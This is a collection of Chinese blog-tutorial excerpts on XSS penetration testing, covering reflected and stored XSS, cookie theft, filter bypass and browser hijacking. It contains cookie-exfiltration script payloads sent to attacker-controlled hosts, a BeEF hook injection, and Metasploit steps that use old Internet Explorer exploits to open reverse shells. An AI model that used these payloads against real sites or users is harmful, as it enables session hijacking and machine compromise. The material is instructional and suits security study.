精华内容
下载资源
问答
  • web渗透测试+xss详解

    2018-10-06 13:31:54
    web渗透测试详细讲解了常见的web漏洞,并模拟真实环境进行攻击演练。xss详解站在代码层面上详细讲解了xss的三种漏洞防护方案。
  • 文章目录前言什么是XSS产生XSS攻击漏洞的原因XSS的类型反射型XSS存储型XSS基于DOM的XSSXSS攻击漏洞的危害冒充受害用户上传木马文件总结 前言   本篇将围绕XSS展开,着重介绍什么是XSSXSS攻击漏洞产生的原因以及...

    前言

      本篇将围绕XSS展开,着重介绍什么是XSS,XSS攻击漏洞产生的原因以及XSS的类型,最后简述XSS攻击漏洞造成的危害。

    什么是XSS

      所谓的XSS英文名为Cross-site scripting,翻译过来是跨站点脚本,缩写本应该是CSS,奈何“生不逢时”。由于此CSS容易与前端的CSS冲突,于是只得改为XSS。由跨站点脚本这个中文名也能看出来,XSS本体为脚本,不过这个脚本有些特殊,而这个特殊点就在这个“跨”字上。
      正常来讲,一个用户浏览网页是难以影响其它用户的。但攻击者可以利用网站的漏洞在特定网页嵌入恶意脚本,然后在特定情境下触发该脚本执行,从而影响到其它用户。因此这个跨既是不同用户浏览的网页,也包含时间上的跨越。
      所以XSS可以理解为特定用户嵌入在网页中的、在特定情境下被执行的恶意脚本

    产生XSS攻击漏洞的原因

      XSS攻击漏洞产生的原因归根结底还是过滤方面的问题。如果网站开发者对用户提交的参数处理不谨慎就直接将其包含在当前或之后的HTTP响应中,就会产生XSS攻击漏洞。
      攻击者可以通过搜索栏、评论栏等地方对网页嵌入恶意代码,也可以通过修改HTML标签达到写入恶意脚本的目的。

    XSS的类型

      XSS的类型有如下三种:

    反射型XSS

      反射型XSS关键点体现在反射上。当攻击者嵌入的恶意代码被立即包含响应在HTTP请求中时产生的XSS就是反射型XSS。由于反射型XSS是立即被执行的,因此无须等待其它用户来触发。这也导致了反射型XSS往往是一次性的,无法持续利用。

    存储型XSS

      存储型XSS关键点反映在存储上。当攻击者嵌入的恶意代码没有被立即包含在响应中,而是包含在以后的特定情境下被其它用户触发时响应的XSS就是存储型XSS。由于存储型XSS具有很长的潜伏期,因此存储型XSS有很强的隐蔽性,并且可以被其它不同的用户持续重复触发。

    基于DOM的XSS

      在讲基于DOM的XSS类型之前先来大致了解什么是DOM。DOM是前端开发用到的一种模型,可以将网页中的元素标签形成树的结构。而基于DOM的XSS就是通过修改DOM树中元素标签来写入恶意代码。因此基于DOM的XSS实际上就是一种特殊类型的存储型XSS。

    XSS攻击漏洞的危害

      XSS实际上就是一个脚本,而这个脚本的主要功能有以下两个:

    冒充受害用户

      XSS可以通过获得受害者存储在客户端本地的cookie尤其是用于登录用的cookie,就能达到冒充受害用户的目的。而攻击者利用该cookie成功登录受害用户的账号后,就能获得该用户所拥有的所有权限。

    上传木马文件

      在存储型XSS攻击中,攻击者通过留言板等功能写入的XSS可以被永久的保存在服务器中,因此还可以借此机会上传木马文件以获得webshell以达到长期控制的作用。

    总结

      XSS攻击漏洞产生的原因是网站开发者对用户提交的数据未经处理就直接将其包含在当前或之后的HTTP响应中。而借此漏洞,攻击者能够获得受害用户用于登录的cookie,也可以上传木马文件以获得webshell。
      以上就是本篇的全部内容,我们下篇见。

    展开全文
  • 文章目录前言存储型XSS最简单的存储型XSS利用存储型XSS获得cookie总结 前言 在了解了反射型XSS相关方面的内容之后,本篇我们将继续深入了解存储型XSS,通过具体的例子讲解存储型XSS攻击的具体流程与危害。 存储型XSS...

    前言

      在了解了反射型XSS相关方面的内容之后,本篇我们将继续深入了解存储型XSS,笔者将通过具体的例子讲解存储型XSS攻击的具体流程与危害。

    存储型XSS

      在之前的博客中我们提到过,存储型XSS是被包含在之后的HTTP请求响应中的,并且由于存储型XSS是伴随于留言评论等功能存在的,因此存储型XSS能够跟随留言内容一同被存入服务器,并且可以持续发挥作用。我们先来看一个简单的存储型XSS的例子。

    最简单的存储型XSS

      我们先在靶场题目提供的评论栏中写入一个最简单的XSS:< script>alert(1)< /script>:
    在评论栏中写入XSS
    提交后再次访问该页面发现有弹窗且弹窗内容为1,表明我们写入的XSS已经随评论一起被存进服务器:
    提交留言后再次访问该页面
    接着查看网页源码:
    查看网页源码
    可以看到我们写入的XSS已经被嵌入到网页中,之后只要有用户浏览该网页就会触发我们写入的XSS。

    利用存储型XSS获得cookie

      原理与上篇反射型XSS中用到的类似,都是借助DNSlog的方式来获得cookie。在评论框写入如下脚本:
    < script src=“http://xxx/”+document.cookie>< /script>
      当该脚本成功嵌入网页源码中时就会触发浏览器执行该XSS,而我们只需查看DNS日志即可获得受害用户的cookie,接着抓包后将cookie替换为受害用户的cookie即可登录受害用户的账号。

    总结

      与反射型XSS不同,由于存储型XSS可以随评论等一同存入服务器,因此可以被持续触发利用。而在获得cookie这块二者原理大致相当,都是将cookie拼接到受攻击者控制的域名中,然后通过查看DNS日志的方式获得cookie,最后修改请求包中的cookie达到冒充受害用户的目的。

    展开全文
  • 文章目录前言反射型XSS最简单的反射型XSS利用反射型XSS获得cookie获得cookie的最简单的方法DNSlog辅助获得cookie总结 前言 在上一篇博客中我们基本了解了XSS的类型和危害,在本篇中我们将通过具体的例子和讲解,深入...

    前言

      在上一篇文章中我们基本了解了XSS的类型和危害,在本篇中我们将通过具体的例子和讲解,深入理解反射型XSS攻击的具体过程及危害。

    反射型XSS

      在上一篇中我们了解到反射型XSS往往存在于需要通过get获得参数的地方,并且是被立即包含在当前响应的HTTP请求中的。接下来我们就来看看一个最简单的反射型XSS例子。

    最简单的反射型XSS

    靶场题目页面如下:
    题目页面
    接着在搜索栏输入一个最简单反射型XSS:< script >alert(1)< /script >,观察页面响应情况:
    输入最简单的反射型XSS
    结果如下:
    反射型XSS结果
    可以看到页面出现一个弹窗且弹框内容显示为1。接着再来看看我们写入这个XSS后浏览器地址栏情况:
    浏览器地址栏情况
    重点在于划红线部分:我们写入的XSS被立即包含在接下来的HTTP请求中。
      由这个简单例子我们就能看出来,反射型XSS攻击的基本流程为:
    1.在需要提交get参数且存在XSS漏洞的地方写入我们的脚本,构成http://xxx/xx?abc=XSS这种形式的虚假URL;
    2.接着通过点击或者提交等方式触发我们写入的XSS;
    3.最后XSS在浏览器中被执行;
    在清楚了反射型XSS工作的原理后,我们再来看看反射型XSS的具体用途。

    利用反射型XSS获得cookie

      之前我们提到过,XSS最主要的危害就是可以让攻击者冒充受害用户,但我们难以直接获得受害用户的账号密码,因此我们把目标放在存有登录验证用的cookie上。

    获得cookie的最简单的方法

      我们在存有XSS漏洞的搜索栏中输入< script>alert(document.cookie)< /script>:
    获得cookie
    提交后结果如下:
    弹出cookie
    可以看到,弹窗已经把cookie展示了出来。
      但现在存在的问题是,如果采用此方法,cookie只会在受害用户的浏览器中弹出,最终我们是无法获得cookie的。联想到SQL盲注,同样是无“回显”,而当时我们的采用的方式是将受我们控制的域名一同写进SQL语句中,然后通过查看服务器访问日志来获得我们想要数据。同样地,在反射型XSS中,我们也可以在XSS中写入受我们控制的域名,然后通过查看该域名服务器的请求日志来获得cookie。

    DNSlog辅助获得cookie

      我们可以在存在XSS漏洞的地方加上诸如以下XSS:
    < script src=“http://127.0.0.1/xss/UYxzH8?1608472710/” + document.cookie;> < /script>(http://127.0.0.1/xss/UYxzH8?1608472710/ 为笔者在本地搭建的XSS平台)
    接着构造诸如以下虚假URL诱使受害用户点击:
    http://xxx/xx?abc=< script src=“http://127.0.0.1/xss/UYxzH8?1608472710/” + document.cookie;> < /script>
      在用户点击之后只需通过查看日志即可获得受害用户的cookie。在获得cookie之后就可以利用抓包工具修改请求包中的cookie,将其替换为受害用户的cookie即可登录受害用户的账号。而诱使用户点击虚假URL的方式有很多,如钓鱼邮件、特殊的图片或文本等等。涉及社会工程学相关方面的技能说难不难,说容易也不容易,笔者在此不做示范。

    总结

      我们可以通过XSS:< script>alert(1)< /script>来简单判断是否存在XSS漏洞。在确定XSS漏洞的类型为反射型之后,可以在XSS中加入受我们控制的域名,使得带有cookie的请求访问我们的服务器。在诱使受害用户点击我们构造的虚假URL之后,我们只需查看DNS请求日志即可获得cookie。最后通过抓包工具修改请求包中的cookie就能达到冒充受害用户的目的,而如果受害者拥有管理员权限,则危害更大,攻击者相当于变相获得了管理员权限。
      以上就是本篇的全部内容,我们下篇见。

    展开全文
  • XSS (cross-site script) 跨站脚本自1996年诞生以来,一直被OWASP(open web application security project) 评为十大安全漏洞中的第二威胁漏洞。也有黑客把XSS当做新型的“缓冲区溢出攻击”而JavaScript是新型的...

    Xss介绍——

    XSS (cross-site script) 跨站脚本自1996年诞生以来,一直被OWASP(open web application security project) 评为十大安全漏洞中的第二威胁漏洞。也有黑客把XSS当做新型的“缓冲区溢出攻击”而JavaScript是新型的shellcode20116月份,新浪微博爆发了XSS蠕虫攻击,仅持续16分钟,感染用户近33000个,危害十分严重。XSS最大的特点就是能注入恶意的代码到用户浏览器的网页上,从而达到劫持用户会话的目的。

    由于web应用程序对用户的输入过滤不严产生的。攻击者利用网站漏把恶意的脚本代码注入到网页中,当用户浏览这些网页时,就会执行其中的恶意代码,对受害用户可能采用cookie资料窃取,会话劫持,钓鱼欺骗等攻击手段。

     

    危害——
    网络钓鱼,包括盗取各类的用户账号
    窃取用户cookie
    窃取用户浏览请回话
    强制弹出广告页面、刷流量
    网页挂马
    提升用户权限,进一步渗透网站
    传播跨站脚本蠕虫等等

     

     

    Xss脚本示例——

    <html>

    <head >xsx test </head >

    <body>

    <script>alert(“xss”)</script >

    </body>

    </html>

    这段代码使用alert函数来执行打开一个消息框,消息框中显示xss信息,使用xss弹出恶意警告框,代码为:

    escript>alert(“xss") </script>

    XSS输入也可能是htm代码段,如果使网页不停的刷新,代码为

    <meta http-equiv=”refresh” content ="0;” >

    嵌入其他网站链接的代码为:

    < ifame src http://xxxxx.com width =0 height =0> </ifame>

     

     

    Xss分类——

    反射型xss(一次性)

     

    存储型xss(持久有效)

    反射型:

    反射型XSS脚本也称作非持久型、参数型跨站脚本、这类型的脚本是最常见的也是使用最为广泛的一种,主要用于将恶意的脚本附加到URL地址的参数中
    如:http://www.xx.com/search.php.?key="><script>alert("xss")</script>一般使用的将构造好的URL发给受害者,是受害者点击触发,而且只执行一次。

     

    存储型:

    存储型XSS比反射型跨站脚本更具威胁性,并且可能影响到web服务器的自身安全。此类XSS不需要用户点击特定的URL就能执行脚本,攻击者事先将恶意JavaScript代码上传或存储到有漏洞服务器中,只要受害者浏览包含此恶意的代码的页面就会执行恶意代码。

     

     

    Xss常用工具——(火狐插件)

    Hackebar

    Live http headers

    Editor cookie

     

    Live HTTP Headers

    该工具可以用来抓取http/https的数据连接包括get post),获取web应用程序流出的流入的数据。我们可以利用该工具发掘web应用程序中的安全漏洞。

     

    Editor cookie

    Cookie信息修改器

     

     

     

     

    示例:

    留言板盗取cookie信息

     

     

    当管理审核后,弹出及有xss漏洞

     

     

    去注册一个免费xss平台,然后创建一个项目,查看代码,复制到留言板上

     

    然后xss免费平台就会返回内容

     

     

    这个就是网站管理员cookie

     

     

    绕过xss限制的几种办法

    magic_quote_gpc

    HEX编码

    改变大小写

    关闭标签

     

    绕过magic_quote_gpc

    magic_quotes_gpc=ONphp中的安全设置,开启后会把一些特殊字符进行轮换,比如’(

    引号)转换为\’”(引号)号转换为\” \转换为\\

    比如<script> alert(“xss”);</script>会转换为<script> alert(\”xss\”);</script>这样XSS就不生效了。针对开启了magic quotes_gpc的网站,可以通过javascript中的String.fromCharCode方法来绕过,可以把alert(“XSS")转换为String.fromCharCode(108,101,114,116,40 34,88,83,83,34,41)那么XSS语句就变成了<script>String.fromCharCode(108,101,114,11640,34,88,83,83,34.,41,59) </script>String.fromCharCode()javascri中的字符申方法,用来 把ASCI转换为字符审

     

    HEX编码:

    可以对语句进行hex编码来绕过XSS规则。

    比如: <script> alert("xss");</script >

    可以转换为:

    %3c%73%63%72%69%70%74%61%6c965%72%74%28%22%783%73%22%29%3b%3c%2f%73%6

    在线网站:

    http://textmechanic.com/ASCII-Hex-Unicode-Base64-Converter.html

    http://www.asciitohex.com/

     

    改变大小写:

    在测试过程中,我们可以改变测试语句的大小来绕过xss规则,如<script> alert("xss");</script >可以转换为<ScRipt> Alert("Xss");</sCripT >

     

    关闭标签:

    <body><script> alert(“xss”);</script> < >

     

     

     

     

    XSS+Beef的使用

    示例1:利用beef劫持客户端浏览器

    启动beef(用户名beef,密码beef

    <script src="http://自己管理的服务器ip:3000/hook.js"></script>把这恶意代码上传到有xss漏洞的网站

     

     

    当有人访问这个网站的时候,恶意代码生效,我们返回本机beef控制台查看上线客户机

     

     

    然后劫持浏览器

     

     

     

     

    示例2.利用beef+msf拿用户shell(基于客户端ie6

    先劫持浏览器,然后启动msf

    msf > use exploit/windows/browser/ms10_002_aurora(选择漏洞模块)

    msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp(选择回链)

    msf exploit(ms10_002_aurora) > set SRVHOST 192.168.230.156客户机访问的地址

    msf exploit(ms10_002_aurora) > set SRVPORT 7777客户机访问的端口

    msf exploit(ms10_002_aurora) > set URIPATH /网页的根/

    msf exploit(ms10_002_aurora) > set LHOST 192.168.230.100客户机回链,写自己的地址

    msf exploit(ms10_002_aurora) > set LPORT 4444回链端口

    msf exploit(ms10_002_aurora) > exploit 开始攻击

    msf生成的那个连接扔beef去,让客户端访问指定的网站就会触发这个漏洞,就可以拿到客户端权限。

     

     

    回车》键入sessions -i sessions -i 1shell(成功拿到客户端权限)

     

     

     

    示例3.利用beef+msf拿用户shell(基于客户端使用ie789

    先劫持浏览器

    msf > use exploit/windows/browser/ie_execcommand_uaf

    msf exploit(ie_execcommand_uaf) > show options

    msf exploit(ie_execcommand_uaf) > set SRVHOST 192.168.230.156

    msf exploit(ie_execcommand_uaf) > set SRVPORT 8888

    msf exploit(ie_execcommand_uaf) > set URIPATH /

    msf exploit(ie_execcommand_uaf) > exploit

    然后把生成的这个连接扔beef里,让客户端访问,msf就有返回回链会话,就可以拿到客户端权限了

     

     

    Xss漏洞扫描与留长期后门——

    常用工具:

    Wvs

    Safe3

    W3af

    Vega

    Xss扫描插件+burp(去下载扫描插件在导入就可以)

     

    转载于:https://www.cnblogs.com/Hydraxx/p/8530906.html

    展开全文
  • 文章目录前言基于DOM的XSS总结 前言 基于DOM的XSS 总结
  •   管理员权限的重要性不言而喻,而在渗透测试中如果能够获得管理员权限,无疑将会奠定胜利的基调。本篇将讲述如何利用XSS漏洞冒充管理员,从而达到获得管理员权限的目的。 准备工作   在攻击者的服务器端准备...
  • 相信大家在做渗透测试的时候都有过这样的经历,明明一个XSS的漏洞,但是却有XSS过滤规则或者WAF保护导致我们不能成功利用,比如我们输入&lt;scirpt&gt;alert("hi")&lt;/script&gt;,会被...
  • 渗透测试-web安全】XSS注入基本分类存储型XSS反射型XSSDOM型XSS总结 基本分类 存储型XSS 反射型XSS DOM型XSS 存储型XSS 黑客在前端写入XSS到数据库–>用户进行web访问–>向服务器请求数据–>返回带XSS...
  • web渗透测试

    2014-05-09 14:30:10
    web渗透测试报告,n包含xss,以及暴力破解。
  • XSS(跨站脚本)概述 Cross-Site Scripting 简称为“CSS”,为避免与...XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。 XSS是一种发生在前端浏览器端的漏洞,所以其危...
  • 希望在各位遇到难解决的WAF或XSS过滤器时,这份备忘录能够给大家提供一些帮助或灵感。作为例子,不能说100%完整,但是我相信这里提供的技术是2020年部分安全人员仍在使用的技术。 标签-属性分隔符 有些过滤器会...
  • XSS渗透测试

    2021-02-25 04:30:47
    渗透测试基本原理:依据渗透策略生成攻击向量,提交给Web服务器,然后根据Web服务器返回的网页来判断相应的检测点是否存在XSS漏洞 一.渗透策略 渗透策略规定了向Web服务器提交的内容,并根据Web服务器的返回信息来...
  • 渗透测试-web安全】DVWA-XSS登录测试进阶 登录 登录DVWA后设置好对应的等级点击打开XSS 测试 测试XSS注入 ~~~php <script>alert('显示则表明存在XSS注入')</script> ~~~ 如上图我们能够确定...
  • xsser_platform:《 Web安全攻防:渗透测试实战指南》 XSS测试平台原始码
  • 渗透测试XSS脚本

    2021-04-17 10:42:03
    是一种经常出现在web应用程序中的计算机安全漏洞,是由于web应用程序对用户 的输入过滤不严产生的。攻击者利用网站漏洞把恶意的脚本代码注入到网页中,当其他 用户浏览这些网页的时候,就会执行其中的恶意代码,对...
  • 案例-xss键盘记录 1.在实验前,先了解一下什么是跨域 http:// www . xyz.com : 8080 / script/test.js 协议 子域名 主域名 端口 资源地址 当协议、主机(主域名,子域名)、端口中的任意一个不...
  • 存储型XSS 1、可长期存储于服务器端 2、每次用户访问都会被执行js脚本,攻击者只需侦听指定端口 #攻击利用方法大体等于反射型xss利用 ##多出现在留言板等位置 *推荐使用burpsuite a、观察返回结果,是否原封不动地...
  • GET型XSS利用:cookie获取 用户与站点 用户——>访问XSS页面,触发脚本——>存在XSS漏洞的站点(pikachu) http://127.0.0.1(在触发脚本的同时,脚本会将窃取的cookies数据发送到攻击者搭建接受cookie的后台...
  • 存储型XSS跟反射型形成的原因一样,不同的是存储型XSS下攻击者可以将脚本注入到后台存储起来,构成更加持久的危害,因此存储型XSS也称“永久型”XSS; 打开pikachu网站-cross-site-scripting 这里可以看到这个是一...
  • POST型XSS的利用:cookie获取 用户——>Request伪造页面,触发表单——>攻击者伪造表单自动提交页面(一个当用户访问这个就会触发js脚本窃取cookie信息给攻击者后台的链接)——>存在post型XSS漏洞的网站 ...
  • web渗透测试笔记.txt

    2020-05-11 12:37:56
    1、渗透测试框架与流程 2、网络漏洞扫描 3、web漏洞扫描 4、文件上传漏洞 5、文件包含漏洞 7、xss和sql注入 8、php代码注入和os命令注入
  • 渗透测试XSS漏洞

    2018-08-08 16:17:12
    XSS是一种经常出现在Web应用中的计算机安全漏洞,它允许恶意Web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin...
  • XSS(cross site script)或者说跨站脚本是一种web应用程序的漏洞,恶意攻击者往web页面里插入恶意script代码,当用户浏览该页之时,嵌入其中web里面的script代码会被执行,从而达到恶意攻击用户的目的。 跨站脚本漏洞...

空空如也

空空如也

1 2 3 4 5 ... 19
收藏数 363
精华内容 145
关键字:

web渗透测试xss